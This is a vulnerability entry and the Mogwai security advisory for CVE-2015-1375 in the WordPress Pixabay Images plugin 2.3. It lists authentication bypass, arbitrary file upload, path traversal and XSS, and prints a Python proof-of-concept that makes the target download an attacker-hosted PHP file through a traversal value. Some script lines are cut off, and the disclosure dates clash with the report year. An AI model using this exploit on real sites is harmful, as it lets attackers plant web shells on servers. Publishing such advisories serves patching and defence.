WordPress Pixabay Images插件任意文件上传漏洞(CVE


WordPress Pixarbay Images 2.3
BUGTRAQ  ID: 73118
 CVE(CAN) ID: CVE-2015-1375

Pixabay Images是一个WordPress插件,可从Pixabay上搜索CC0公共域图片,插入到博客内。

Pixabay Images 2.4之前版本,pixabay-images.php没有正确限制访问上传功能,远程攻击者利用此漏洞可对任意文件进行写操作。

<*来源:Hans-Martin Muench


警 告

Mogwai Security Advisory MSA-2015-01
 Title:              WP Pixarbay Images Multiple Vulnerabilities
 Product:            Pixarbay Images (Wordpress Plugin)
 Affected versions:  2.3
 Impact:            high
 Remote:            yes
 Product link:      https://wordpress.org/plugins/pixabay-images/
 Reported:          14/01/2015
 by:                Hans-Martin Muench (Mogwai, IT-Sicherheitsberatung Muench)

 Vendor's Description of the Software:
 Pixabay Images is a WordPress plugin that let's you pick CC0 public
 domain pictures from Pixabay and insert them with just a click anywhere
 on your blog. The images are safe to use, and paying attribution or
 linking back to the source is not required.

 Business recommendation:
 Update to version 2.4

Vulnerability description:
 1) Authentication bypass
 The plugin does not correctly check if the user is logged in. Certain
 code can be called without authentication

2) Arbitrary file upload
 The plugin code does not validate the host in the provided download URL,
 which allows to upload malicious files, including PHP code.

3) Path Traversal
 Certain values are not sanitized before they are used in a file operation.
 This allows to store files outside of the "download" folder.

4) Cross Site Scripting (XSS)
 The generated author link uses unsanitized user values which can be
 abused for Cross Site Scripting (XSS) attacks.

 Proof of concept:
 The following PoC Python script can be used to download PHP files from
 a attacker controlled host.

#!/usr/bin/env python

import argparse
 import httplib, urllib
 from urlparse import urlparse

def exploit(target_url, shellcode_url):

target = urlparse(target_url)

params = urllib.urlencode({'pixabay_upload': 1, 'image_url': shellcode_url,
 'image_user': 'none', 'q':'xxx/../../../../../../mogwai'})
 headers = headers = {"Content-type": "application/x-www-form-urlencoded"}

print "[+] Sending download request...."
 conn = httplib.HTTPConnection(target.netloc)
 conn.request("POST", target.path + "/wp-admin/", params, headers)

response = conn.getresponse()
 response_data = response.read()
 if response.status != 200 and response_data != "Error: File attachment metadata
 print "[-] Something went wrong"
 print response_data


 # ---- Main code ----------------
 parser = argparse.ArgumentParser()
 parser.add_argument("target_url", help="The target url, for example
 parser.add_argument("shellcode_url", help="The url of the PHP file that should
 be uploaded, for example: ")

print "----------------------------------------------"
print " pixabay upload wordpress plugin exploit PoC"
 print " Mogwai security"
 print "----------------------------------------------"

arguments = parser.parse_args()
 exploit(arguments.target_url, arguments.shellcode_url)

 Vulnerable / tested versions:
 Pixabay Images 2.3

 Disclosure timeline:
 14/01/2014: Reporting issues to the plugin author
 15/01/2014: Release of fixed version (2.4)
 19/01/2014: Public advisory

 Advisory URL:

